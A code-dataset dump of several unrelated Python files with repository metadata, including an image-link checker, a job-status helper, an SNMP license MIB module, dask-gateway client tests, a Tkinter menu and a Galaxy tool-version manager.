self.assertTrue(brine.dumpable(x)) # noqa
y = brine.dump(x) # noqa
z = brine.load(y)
self.assertEqual(x, z) # noqa
if __name__ == "__main__":
unittest.main()
| 33.818182 | 93 | 0.538978 |
acfb62a76012c8378b25a733f7f816be43217d2d | 2,071 | py | Python | inspector.py | rukeba/img-link-inspector | 963fda0688f3de3e030f34cec50a12dbd2440d1c | [
"MIT"
] | null | null | null | inspector.py | rukeba/img-link-inspector | 963fda0688f3de3e030f34cec50a12dbd2440d1c | [
"MIT"
] | null | null | null | inspector.py | rukeba/img-link-inspector | 963fda0688f3de3e030f34cec50a12dbd2440d1c | [
"MIT"
] | null | null | null | import re
import urllib.parse
import requests
import bs4
class ImgLinkInspector(object):
def __init__(self, page_url, **kwargs):
self.page_url = page_url
self.src_attr = kwargs.get('src_attr', 'src')
self.verbose = bool(kwargs.get('verbose', False))
parsed_url = urllib.parse.urlparse(self.page_url)
self.default_scheme = parsed_url.scheme
self.default_scheme_host = f'{parsed_url.scheme}://{parsed_url.netloc}'
self._re_ignore_images_urls = re.compile(r'^data:', re.I)
def inspect(self):
html = self._load_page()
image_urls = self._find_image_urls(html)
if self.verbose:
print(f'{len(image_urls)} image urls found')
url_statuses = self._check_url_response(image_urls)
return url_statuses
def _load_page(self):
resp = requests.get(self.page_url)
resp.raise_for_status()
html = resp.text
return html
def _find_image_urls(self, html):
soup = bs4.BeautifulSoup(html, 'html.parser')
image_elements = soup.findAll('img')
image_urls = set()
for el in image_elements:
src = el['src']
if not self._re_ignore_images_urls.match(src):
image_urls.add(self._assert_default_scheme(src))
else:
src = el[self.src_attr]
if not self._re_ignore_images_urls.match(src):
image_urls.add(self._assert_default_scheme(src))
return image_urls
def _assert_default_scheme(self, url):
if url.startswith('//'):
return f'{self.default_scheme}:{url}'
if url.startswith('/'):
return f'{self.default_scheme_host}{url}'
return url
def _check_url_response(self, image_urls):
statuses = []
for url in image_urls:
url_resp = requests.head(url, allow_redirects=True)
if url_resp.status_code >= 400 or self.verbose:
statuses.append((url_resp.status_code, url))
return statuses
| 33.403226 | 79 | 0.618059 |
acfb635bae902e2363e208b21027803f569b2e98 | 243 | py | Python | python/easy/remove-element.py | anidever/leetcode | fd8ac6d9c5e80d03ea6a5e4988502dcffff0ddc7 | [
"WTFPL"
] | null | null | null | python/easy/remove-element.py | anidever/leetcode | fd8ac6d9c5e80d03ea6a5e4988502dcffff0ddc7 | [
"WTFPL"
] | null | null | null | python/easy/remove-element.py | anidever/leetcode | fd8ac6d9c5e80d03ea6a5e4988502dcffff0ddc7 | [
"WTFPL"
] | 1 | 2020-12-20T00:52:26.000Z | 2020-12-20T00:52:26.000Z | # question can be found at leetcode.com/problems/remove-element/
from Typing import List
class Solution:
def removeElement(self, nums: List[int], val: int) -> int:
nums[:] = [i for i in nums if i != val]
return len(nums)
| 27 | 64 | 0.654321 |
acfb639e33977f4b2d4c51a91994115d2051f54f | 4,758 | py | Python | pyjobweb/jobInfo/getStatus.py | vvaradarajan/pyJobWeb | eb83ce09f9a9f9185e31e53b2fda8b56981e26af | [
"Apache-2.0"
] | 1 | 2019-03-19T12:23:53.000Z | 2019-03-19T12:23:53.000Z | pyjobweb/jobInfo/getStatus.py | vvaradarajan/pyJobWeb | eb83ce09f9a9f9185e31e53b2fda8b56981e26af | [
"Apache-2.0"
] | null | null | null | pyjobweb/jobInfo/getStatus.py | vvaradarajan/pyJobWeb | eb83ce09f9a9f9185e31e53b2fda8b56981e26af | [
"Apache-2.0"
] | null | null | null | '''
Created on Oct 15, 2016
@author: vasan
'''
import os
import errno
import json
import inspect
import csv
from jobInfo.commandHandler import cmdOutputParser
from jobInfo.dbUtils import job
class jobStatus:
'''Reads the status file and returns a json '''
flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY
## The stuff below is to help in creating the google visualization data table
@staticmethod
def newColumn(self,colNM,colType):
col={}
col["id"]="";col['label']=colNM;col['pattern']="";col['type']=colType
return col
def convertJsonLineToGoogleDataTable(self,jsonline):
#do the cols object
print(jsonline.__class__)
for key in jsonline:
print (key, 'corresponds to', jsonline[key])
jobset=jsonline[key]
#explicitly put in the cols array (needs to be ordered!)
cols=[]
col=['jobId','idle','executing','complete']
cols.append(col)
col=['string','number','number','number']
cols.append(col)
#Now put the data in the order of the cols
print(jobset.__class__)
for job in jobset:
print (job)
row=[]
for attr in cols[0]:
if attr in job:
row.append(job[attr])
else:
row.append(0)
cols.append(row)
print(cols)
return cols
# cols=[]
# j=jsonline[0]
# for k in j:
# print (k)
def getStatus(self):
try:
lf = os.open(self.lfNM, jobStatus.flags)
except OSError as e:
if e.errno == errno.EEXIST: # Failed as the file already exists.
pass
else: # Notsure what the error is, so return nunn
print("Unknown error: "+ e.errno);
return {} #return status
#Read Json from file and returnhttps://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiV_7CK193PAhVnsFQKHRZVB64QFggkMAI&url=http%3A%2F%2Fstackoverflow.com%2Fquestions%2F68645%2Fstatic-class-variables-in-python&usg=AFQjCNENgcl06PKrGi1TimZ6rpA7AYv6Mg&sig2=X2n2Jcr38nxF4oAH6tkXFA
with open(self.dfNM) as f:
jsonLine=json.load(f);
os.close(lf)
os.remove(self.lfNM)
return self.convertJsonLineToGoogleDataTable(jsonLine)
return jsonLine
def getStartJobs(self,categ): #not get but exec
self.jobCateg=categ
cmdOutputParser.threadOsCommand(self.jobRunCmd+" "+self.jobCateg)
#return the lineal time
jobList=job.getJobList(categ)
print("No jobs in categ: "+categ)
if len(jobList)==0:
print("No jobs in categ: "+categ+"\nExiting")
sys.exit(1)
lt={}
lt['linealTime'] = jobStatus.getLinealTime(jobList)
return lt
def __init__(self, config):
"""Constructor"""
self.lfNM=config['jobLockfile']
self.dfNM=config['jobRptfile']
self.jobsfNM=config['jobConfigfile']
self.jobRunCmd=config['jobRunCmd']
self.jobCateg=config['defaultJobCateg']
def getJobList(self,categ):
return self.getJobListFromDB(categ) #get JobList from file
def getJobListFromFile(self):
#read the joblist and create a json array of job objects
with open(self.jobsfNM) as f:
jobLineRdt = csv.reader(f,delimiter=',')
#The first line is #Format: jobId, jobClass, jobParams
jobArray=[]
for row in jobLineRdt:
jobrow=[]
for s in row:
if (s.startswith("#Format:") ): #process header row
jobrow.append(s[9:])
else:
jobrow.append(s)
jobArray.append(jobrow)
print (', '.join(row)) #row is a list of strings and join makes it one string
return jobArray
def getJobListFromDB(self,categ):
print (job.getJobList(categ))
return job.getJobList(categ)
def getCateg(self):
categList=[]
for s in job.getJobCategList() :
opt={}
opt["name"]=s
categList.append(opt)
return categList
@staticmethod
def getLinealTime(JobList):
return job.getLinealTime(JobList)
#for testing
if __name__ == "__main__":
# execute only if run as a script
lfNM="C:/junk/junk.lock"
dfNM="C:/junk/report.txt"
jfNM="C:/junk/jobs.txt"
ji=jobStatus(lfNM,dfNM,jfNM)
print(inspect.getmembers(ji))
ji.getStatus()
| 34.478261 | 304 | 0.567886 |
acfb644c980291eeeaaa0b69a7774ebb862eeeeb | 7,766 | py | Python | pysnmp-with-texts/GENLIC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/GENLIC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/GENLIC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module GENLIC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/GENLIC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:19:27 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Integer32, NotificationType, ObjectIdentity, iso, enterprises, Gauge32, IpAddress, MibIdentifier, TimeTicks, ModuleIdentity, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, Unsigned32, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "NotificationType", "ObjectIdentity", "iso", "enterprises", "Gauge32", "IpAddress", "MibIdentifier", "TimeTicks", "ModuleIdentity", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "Unsigned32", "Bits")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
lannet = MibIdentifier((1, 3, 6, 1, 4, 1, 81))
license = ModuleIdentity((1, 3, 6, 1, 4, 1, 81, 37))
if mibBuilder.loadTexts: license.setLastUpdated('0006220000Z')
if mibBuilder.loadTexts: license.setOrganization('Lucent Technologies Inc.')
if mibBuilder.loadTexts: license.setContactInfo('Itai Zilbershtein -- izilbers@lucent.com')
if mibBuilder.loadTexts: license.setDescription('Lucent Common License MIB')
licensePerModule = MibIdentifier((1, 3, 6, 1, 4, 1, 81, 37, 1))
licModuleIdentTable = MibTable((1, 3, 6, 1, 4, 1, 81, 37, 1, 1), )
if mibBuilder.loadTexts: licModuleIdentTable.setStatus('current')
if mibBuilder.loadTexts: licModuleIdentTable.setDescription('Table of module identifieres used for requesting licenses')
licModuleIdentEntry = MibTableRow((1, 3, 6, 1, 4, 1, 81, 37, 1, 1, 1), ).setIndexNames((0, "GENLIC-MIB", "licModuleIdentIndex"))
if mibBuilder.loadTexts: licModuleIdentEntry.setStatus('current')
if mibBuilder.loadTexts: licModuleIdentEntry.setDescription('An entry in the table, containing data about a single modules operations.')
licModuleIdentIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: licModuleIdentIndex.setStatus('current')
if mibBuilder.loadTexts: licModuleIdentIndex.setDescription('Index which identifies the module inside the chassis for which this entry contains information. Equals the number of the slot by which the group is accessed or the stackable index.')
licModuleIdentUniqueID = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 1, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(6, 6)).setFixedLength(6)).setMaxAccess("readonly")
if mibBuilder.loadTexts: licModuleIdentUniqueID.setStatus('current')
if mibBuilder.loadTexts: licModuleIdentUniqueID.setDescription('The Unique identifier of this module. Example: the MAC Address of the agent onboard a P330 module. Must be 6 octets long.')
licFeatureTable = MibTable((1, 3, 6, 1, 4, 1, 81, 37, 1, 2), )
if mibBuilder.loadTexts: licFeatureTable.setStatus('current')
if mibBuilder.loadTexts: licFeatureTable.setDescription('Table of features and their licenses as entered to each module.')
licFeatureTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1), ).setIndexNames((0, "GENLIC-MIB", "licModuleIdentIndex"), (0, "GENLIC-MIB", "licFeatureId"))
if mibBuilder.loadTexts: licFeatureTableEntry.setStatus('current')
if mibBuilder.loadTexts: licFeatureTableEntry.setDescription('An entry in the table, containing data about a particular feature on a particular module.')
licFeatureId = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 208, 209))).clone(namedValues=NamedValues(("smon", 1), ("richLayer2", 2), ("routing", 3), ("serverLoadBalance", 4), ("rfc1483", 5), ("loadBalance", 6), ("cajunViewPlus", 208), ("realNetRules", 209)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: licFeatureId.setStatus('current')
if mibBuilder.loadTexts: licFeatureId.setDescription('The basic feature type. Features numbered 208 (0xD0) and above are reserved for host-based applications. ')
licFeatureModifier = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: licFeatureModifier.setStatus('current')
if mibBuilder.loadTexts: licFeatureModifier.setDescription('The FeatureModifier field for this feature. value Set when a license is entered.')
licFeatureName = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(16, 16)).setFixedLength(16)).setMaxAccess("readonly")
if mibBuilder.loadTexts: licFeatureName.setStatus('current')
if mibBuilder.loadTexts: licFeatureName.setDescription('The name of the feature. Used by CLI commands. Must be a lowercase string without spaces. Feature Names: smon - Switch Monitoring routing - Enable routing functions rich-layer-2 - Enable Policy calssifications and actions in a Layer 2 switch server-load-balance - Load balancing server traffic. rfc-1483 - Enable RFC 1483 functions. load-balance - Enable load balancing. cajun-view-plus - host-based Network Managemnet application real-net-rules - host-based Policy Management application.')
licFeatureLicense = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 12)).clone(hexValue="0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: licFeatureLicense.setStatus('current')
if mibBuilder.loadTexts: licFeatureLicense.setDescription('The License needed for this feature. The length serves to diffrentiate between the old SMON scheme and the new versions. 9 octet string - license version 0x02 and onwards 12 octets string - old SMON license. Note that on pre-configured devices, a feature may be active without a license key (License key=0).')
licFeatureLicenseStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("licensed", 1), ("unlicensed", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: licFeatureLicenseStatus.setStatus('current')
if mibBuilder.loadTexts: licFeatureLicenseStatus.setDescription('The state of the feature in terms of the licensing mechanism. State will change to licensed(1) if a valid license is enetered, or if the feature is somhow pre-configured. Note that a licensed feature may be inactive. However, an unlicened feature cannot be activated.')
mibBuilder.exportSymbols("GENLIC-MIB", licModuleIdentTable=licModuleIdentTable, licFeatureTableEntry=licFeatureTableEntry, license=license, licModuleIdentUniqueID=licModuleIdentUniqueID, licFeatureModifier=licFeatureModifier, lannet=lannet, licensePerModule=licensePerModule, licFeatureTable=licFeatureTable, licFeatureLicense=licFeatureLicense, licModuleIdentIndex=licModuleIdentIndex, licModuleIdentEntry=licModuleIdentEntry, licFeatureName=licFeatureName, licFeatureId=licFeatureId, PYSNMP_MODULE_ID=license, licFeatureLicenseStatus=licFeatureLicenseStatus)
| 141.2 | 560 | 0.785475 |
acfb6455a59a589ef56a9ed570859bf7e08e34c6 | 14,604 | py | Python | tests/test_client.py | raybellwaves/dask-gateway | b86e3066839c44801c11a51564091f59b705f342 | [
"BSD-3-Clause"
] | 69 | 2019-09-19T06:19:48.000Z | 2022-02-04T23:01:15.000Z | tests/test_client.py | raybellwaves/dask-gateway | b86e3066839c44801c11a51564091f59b705f342 | [
"BSD-3-Clause"
] | 318 | 2019-09-18T18:42:57.000Z | 2022-03-31T11:05:38.000Z | tests/test_client.py | raybellwaves/dask-gateway | b86e3066839c44801c11a51564091f59b705f342 | [
"BSD-3-Clause"
] | 61 | 2019-09-18T18:09:56.000Z | 2022-03-25T20:35:11.000Z | import time
import aiohttp
import yarl
import pytest
import dask
from dask_gateway.auth import get_auth, BasicAuth, KerberosAuth, JupyterHubAuth
from dask_gateway.client import Gateway, GatewayCluster, cleanup_lingering_clusters
from dask_gateway_server.compat import get_running_loop
from .utils_test import temp_gateway
def test_get_auth():
# Pass through existing auth objects
auth = BasicAuth()
assert get_auth(auth) is auth
# Auth by keyword name
auth = get_auth("basic")
assert isinstance(auth, BasicAuth)
auth = get_auth("kerberos")
assert isinstance(auth, KerberosAuth)
# Auth from config
config = {"gateway": {"auth": {"type": "basic", "kwargs": {}}}}
with dask.config.set(config):
auth = get_auth()
assert isinstance(auth, BasicAuth)
# Auth from config with import path
config = {
"gateway": {"auth": {"type": "dask_gateway.auth.BasicAuth", "kwargs": {}}}
}
with dask.config.set(config):
auth = get_auth()
assert isinstance(auth, BasicAuth)
# Auth from config with kwargs
config = {"gateway": {"auth": {"type": "basic", "kwargs": {"username": "bruce"}}}}
with dask.config.set(config):
auth = get_auth()
assert isinstance(auth, BasicAuth)
assert auth.username == "bruce"
# Errors
with pytest.raises(TypeError):
get_auth(1)
with pytest.raises(TypeError):
get_auth(lambda: 1)
with pytest.raises(ImportError):
get_auth("dask_gateway.auth.Foo")
with pytest.raises(ImportError):
get_auth("not_a_real_module_name_foo_barrr")
def test_config_auth_kwargs_template_environment_vars(monkeypatch):
monkeypatch.setenv("TEST_USER", "bruce")
config = {
"gateway": {"auth": {"type": "basic", "kwargs": {"username": "{TEST_USER}"}}}
}
with dask.config.set(config):
auth = get_auth()
assert isinstance(auth, BasicAuth)
assert auth.username == "bruce"
def test_jupyterhub_auth(monkeypatch):
with pytest.raises(ValueError) as exc:
get_auth("jupyterhub")
assert "JUPYTERHUB_API_TOKEN" in str(exc.value)
monkeypatch.setenv("JUPYTERHUB_API_TOKEN", "abcde")
auth = get_auth("jupyterhub")
assert auth.api_token == "abcde"
assert isinstance(auth, JupyterHubAuth)
# Parameters override environment variable
assert JupyterHubAuth(api_token="other").api_token == "other"
def test_client_init():
config = {
"gateway": {
"address": "http://127.0.0.1:8888",
"public-address": None,
"proxy-address": 8786,
"auth": {"type": "basic", "kwargs": {"username": "bruce"}},
"http-client": {"proxy": None},
}
}
with dask.config.set(config):
# Defaults
gateway = Gateway()
assert gateway.address == "http://127.0.0.1:8888"
assert gateway._public_address == "http://127.0.0.1:8888"
assert gateway.proxy_address == "gateway://127.0.0.1:8786"
assert gateway.auth.username == "bruce"
# Address override
gateway = Gateway(address="http://127.0.0.1:9999")
assert gateway.address == "http://127.0.0.1:9999"
# Proxy address override
gateway = Gateway(proxy_address="gateway://123.4.5.6:9999")
assert gateway.proxy_address == "gateway://123.4.5.6:9999"
# Auth override
gateway = Gateway(auth="kerberos")
assert isinstance(gateway.auth, KerberosAuth)
config = {
"gateway": {
"address": None,
"public-address": None,
"proxy-address": 8786,
"auth": {"type": "basic", "kwargs": {}},
"http-client": {"proxy": None},
}
}
with dask.config.set(config):
# No address provided
with pytest.raises(ValueError):
Gateway()
config["gateway"]["address"] = "http://127.0.0.1:8888"
config["gateway"]["proxy-address"] = None
config["gateway"]["public-address"] = "https://public.com/dask"
with dask.config.set(config):
g = Gateway()
assert g.proxy_address == "gateway://127.0.0.1:8888"
assert g._public_address == "https://public.com/dask"
def test_gateway_proxy_address_infer_port():
with dask.config.set(gateway__proxy_address=None):
g = Gateway("http://localhost")
assert g.proxy_address == "gateway://localhost:80"
g = Gateway("https://localhost")
assert g.proxy_address == "gateway://localhost:443"
def test_gateway_addresses_template_environment_vars(monkeypatch):
monkeypatch.setenv("TEST", "foobar")
with dask.config.set(
gateway__address="http://{TEST}:80",
gateway__proxy_address=8785,
gateway__public_address="/{TEST}/foo/",
):
g = Gateway()
assert g.address == "http://foobar:80"
assert g.proxy_address == "gateway://foobar:8785"
assert g._public_address == "/foobar/foo"
with dask.config.set(gateway__proxy_address="gateway://{TEST}:8787"):
g = Gateway("http://test.com")
assert g.address == "http://test.com"
assert g.proxy_address == "gateway://foobar:8787"
def test_http_client_proxy_false(monkeypatch):
with dask.config.set(gateway__http_client__proxy=False):
monkeypatch.setenv("http_proxy", "http://alice:password@host:80/path")
# http_proxy environment variable ignored
g = Gateway("http://myhost:80")
assert g._request_kwargs == {"proxy": None, "proxy_auth": None}
def test_http_client_proxy_true(monkeypatch):
http_proxy = "http://alice:password@host:80/path"
proxy_sol = yarl.URL("http://host:80/path")
proxy_auth_sol = aiohttp.BasicAuth("alice", "password")
with dask.config.set(gateway__http_client__proxy=True):
with monkeypatch.context() as m:
for k in ["http_proxy", "https_proxy"]:
m.delenv(k, raising=False)
m.delenv(k.upper(), raising=False)
with m.context() as m2:
m2.setenv("http_proxy", http_proxy)
# Properly inferred from environment
g = Gateway("http://myhost:80")
assert g._request_kwargs["proxy"] == proxy_sol
assert g._request_kwargs["proxy_auth"] == proxy_auth_sol
# No HTTPS proxy set
g = Gateway("https://myhost:80")
assert g._request_kwargs == {"proxy": None, "proxy_auth": None}
# No HTTP proxy set
g = Gateway("http://myhost:80")
assert g._request_kwargs == {"proxy": None, "proxy_auth": None}
def test_http_client_proxy_explicit(monkeypatch):
http_proxy = "http://alice:password@host:80/path"
proxy_sol = yarl.URL("http://host:80/path")
proxy_auth_sol = aiohttp.BasicAuth("alice", "password")
with dask.config.set(gateway__http_client__proxy=http_proxy):
with monkeypatch.context() as m:
m.setenv("http_proxy", "http://bob:foobar@otherhost:90/path")
# Loaded from config, not environment variables
for scheme in ["http", "https"]:
g = Gateway(f"{scheme}://myhost:80")
assert g._request_kwargs["proxy"] == proxy_sol
assert g._request_kwargs["proxy_auth"] == proxy_auth_sol
@pytest.mark.asyncio
async def test_get_versions():
from dask_gateway_server import __version__ as server_version
from dask_gateway import __version__ as client_version
async with temp_gateway() as g:
async with g.gateway_client() as gateway:
versions = await gateway.get_versions()
assert versions["client"]["version"] == client_version
assert versions["server"]["version"] == server_version
@pytest.mark.asyncio
async def test_client_reprs():
async with temp_gateway() as g:
async with g.gateway_client() as gateway:
cluster = await gateway.new_cluster()
# Plain repr
assert cluster.name in repr(cluster)
# HTML repr with dashboard
cluster.dashboard_link = f"{g.address}/clusters/{cluster.name}/status"
assert cluster.name in cluster._repr_html_()
assert cluster.dashboard_link in cluster._repr_html_()
# Client dashboard link
client = cluster.get_client()
assert client.dashboard_link == cluster.dashboard_link
# HTML repr with no dashboard
cluster.dashboard_link = None
assert "Not Available" in cluster._repr_html_()
await cluster.shutdown()
@pytest.mark.asyncio
async def test_cluster_widget():
pytest.importorskip("ipywidgets")
def test():
with GatewayCluster(
address=g.address, proxy_address=g.proxy_address
) as cluster:
# Smoke test widget
cluster._widget()
template = "<tr><th>Workers</th> <td>%d</td></tr>"
assert (template % 0) in cluster._widget_status()
cluster.scale(1)
timeout = time.time() + 30
while time.time() < timeout:
if cluster.scheduler_info.get("workers"):
break
time.sleep(0.25)
else:
assert False, "didn't scale up in time"
assert (template % 1) in cluster._widget_status()
async with temp_gateway() as g:
loop = get_running_loop()
await loop.run_in_executor(None, test)
@pytest.mark.asyncio
async def test_dashboard_link_from_public_address():
pytest.importorskip("bokeh")
async with temp_gateway() as g:
with dask.config.set(
gateway__address=g.address,
gateway__public_address="/services/dask-gateway/",
gateway__proxy_address=g.proxy_address,
):
async with Gateway(asynchronous=True) as gateway:
assert gateway._public_address == "/services/dask-gateway"
cluster = await gateway.new_cluster()
sol = "/services/dask-gateway/clusters/%s/status" % cluster.name
assert cluster.dashboard_link == sol
clusters = await gateway.list_clusters()
for c in clusters:
assert c.dashboard_link.startswith("/services/dask-gateway")
@pytest.mark.asyncio
async def test_create_cluster_with_GatewayCluster_constructor():
async with temp_gateway() as g:
async with GatewayCluster(
address=g.address, proxy_address=g.proxy_address, asynchronous=True
) as cluster:
# Cluster is now present in list
clusters = await cluster.gateway.list_clusters()
assert len(clusters)
assert clusters[0].name == cluster.name
await cluster.scale(1)
async with cluster.get_client(set_as_default=False) as client:
res = await client.submit(lambda x: x + 1, 1)
assert res == 2
assert cluster.status == "closed"
async with g.gateway_client() as gateway:
# No cluster running
clusters = await gateway.list_clusters()
assert not clusters
@pytest.mark.asyncio
async def test_sync_constructors():
def test():
with g.gateway_client(asynchronous=False) as gateway:
with gateway.new_cluster() as cluster:
cluster.scale(1)
client = cluster.get_client()
res = client.submit(lambda x: x + 1, 1).result()
assert res == 2
with gateway.connect(cluster.name) as cluster2:
client2 = cluster2.get_client()
res = client2.submit(lambda x: x + 1, 1).result()
assert res == 2
async with temp_gateway() as g:
loop = get_running_loop()
await loop.run_in_executor(None, test)
@pytest.mark.asyncio
async def test_GatewayCluster_shutdown_on_close():
async with temp_gateway() as g:
def test():
cluster = GatewayCluster(address=g.address, proxy_address=g.proxy_address)
assert cluster.shutdown_on_close
assert cluster in GatewayCluster._instances
loop = get_running_loop()
await loop.run_in_executor(None, test)
assert len(GatewayCluster._instances) == 0
async with g.gateway_client() as gateway:
# No cluster running
clusters = await gateway.list_clusters()
assert not clusters
@pytest.mark.asyncio
async def test_GatewayCluster_client_error_doesnt_prevent_cleanup():
"""Check that an error on closing clients doesn't prevent cluster shutdown"""
async with temp_gateway() as g:
class BadGatewayCluster(GatewayCluster):
async def _stop_async(self):
await super()._stop_async()
raise ValueError("OH NO")
def test():
cluster = BadGatewayCluster(
address=g.address, proxy_address=g.proxy_address
)
assert cluster in GatewayCluster._instances
loop = get_running_loop()
await loop.run_in_executor(None, test)
assert len(GatewayCluster._instances) == 0
async with g.gateway_client() as gateway:
# No cluster running
clusters = await gateway.list_clusters()
assert not clusters
@pytest.mark.asyncio
async def test_GatewayCluster_cleanup_atexit():
async with temp_gateway() as g:
def test():
return GatewayCluster(address=g.address, proxy_address=g.proxy_address)
loop = get_running_loop()
cluster = await loop.run_in_executor(None, test)
assert len(GatewayCluster._instances) == 1
def test_cleanup():
# No warnings raised by cleanup function
with pytest.warns(None) as rec:
cleanup_lingering_clusters()
for r in rec:
assert not issubclass(r.category, UserWarning)
# Cluster is now closed
assert cluster.status == "closed"
# No harm in double running
with pytest.warns(None) as rec:
cleanup_lingering_clusters()
for r in rec:
assert not issubclass(r.category, UserWarning)
await loop.run_in_executor(None, test_cleanup)
async with g.gateway_client() as gateway:
# No cluster running
clusters = await gateway.list_clusters()
assert not clusters
| 33.266515 | 86 | 0.617913 |
acfb64747dd03001396595009b4a83b4bbd986fa | 1,293 | py | Python | src/ui/main_ui.py | PeachyPrinter/tkpeachyprinter | d88dcb4891d19c4b81a7f4f072e120d05c02124c | [
"Apache-2.0"
] | 1 | 2017-03-08T02:48:19.000Z | 2017-03-08T02:48:19.000Z | src/ui/main_ui.py | PeachyPrinter/tkpeachyprinter | d88dcb4891d19c4b81a7f4f072e120d05c02124c | [
"Apache-2.0"
] | null | null | null | src/ui/main_ui.py | PeachyPrinter/tkpeachyprinter | d88dcb4891d19c4b81a7f4f072e120d05c02124c | [
"Apache-2.0"
] | 6 | 2016-05-12T04:10:18.000Z | 2020-02-15T09:55:00.000Z | from Tkinter import *
from ui_tools import *
import sys
class MainUI(PeachyFrame):
def initialize(self):
self.grid()
try:
from VERSION import version
version = "Peachy Printer Tools (version: %s)" % version
except:
version = "Peachy Printer Tools (version: %s)" % "DEVELOPMENT"
Button(self, text=u"Setup Printers", command=self._setup_printers).grid(column=1, row=10, sticky=NSEW)
Button(self, text=u"Print", command=self._print).grid(column=1, row=20, sticky=NSEW)
Label(self).grid(column=1, row=30)
Button(self, text=u"Licence", command=self._licence).grid(column=1, row=40, sticky=NSEW)
Label(self).grid(column=1, row=50)
Button(self, text=u"Quit", command=self._quit).grid(column=0, row=60)
Label(self).grid(column=1, row=70)
Label(self, text=version).grid(column=2, row=80, sticky=S+E)
self.update()
def _setup_printers(self):
from ui.configuration_ui import SetupUI
self.navigate(SetupUI)
def _print(self):
from ui.print_ui import PrintUI
self.navigate(PrintUI)
def _licence(self):
from ui.licence_ui import LicenceUI
self.navigate(LicenceUI)
def _quit(self):
sys.exit(0)
| 33.153846 | 110 | 0.634184 |
acfb64a4542bc9444977fad53b7dc43e3e936bb8 | 3,218 | py | Python | lib/tool_shed/tools/tool_version_manager.py | rikeshi/galaxy | c536a877e4a9b3d12aa0d00fd4d5e705109a0d0a | [
"CC-BY-3.0"
] | 1,085 | 2015-02-18T16:14:38.000Z | 2022-03-30T23:52:07.000Z | lib/tool_shed/tools/tool_version_manager.py | rikeshi/galaxy | c536a877e4a9b3d12aa0d00fd4d5e705109a0d0a | [
"CC-BY-3.0"
] | 11,253 | 2015-02-18T17:47:32.000Z | 2022-03-31T21:47:03.000Z | lib/tool_shed/tools/tool_version_manager.py | rikeshi/galaxy | c536a877e4a9b3d12aa0d00fd4d5e705109a0d0a | [
"CC-BY-3.0"
] | 1,000 | 2015-02-18T16:18:10.000Z | 2022-03-29T08:22:56.000Z | import logging
from sqlalchemy import and_
from tool_shed.util import hg_util
from tool_shed.util import metadata_util
from tool_shed.util import repository_util
log = logging.getLogger(__name__)
class ToolVersionManager:
def __init__(self, app):
self.app = app
def get_tool_version(self, tool_id):
context = self.app.install_model.context
return context.query(self.app.install_model.ToolVersion) \
.filter(self.app.install_model.ToolVersion.table.c.tool_id == tool_id) \
.first()
def get_tool_version_association(self, parent_tool_version, tool_version):
"""
Return a ToolVersionAssociation if one exists that associates the two
received tool_versions. This function is called only from Galaxy.
"""
context = self.app.install_model.context
return context.query(self.app.install_model.ToolVersionAssociation) \
.filter(and_(self.app.install_model.ToolVersionAssociation.table.c.parent_id == parent_tool_version.id,
self.app.install_model.ToolVersionAssociation.table.c.tool_id == tool_version.id)) \
.first()
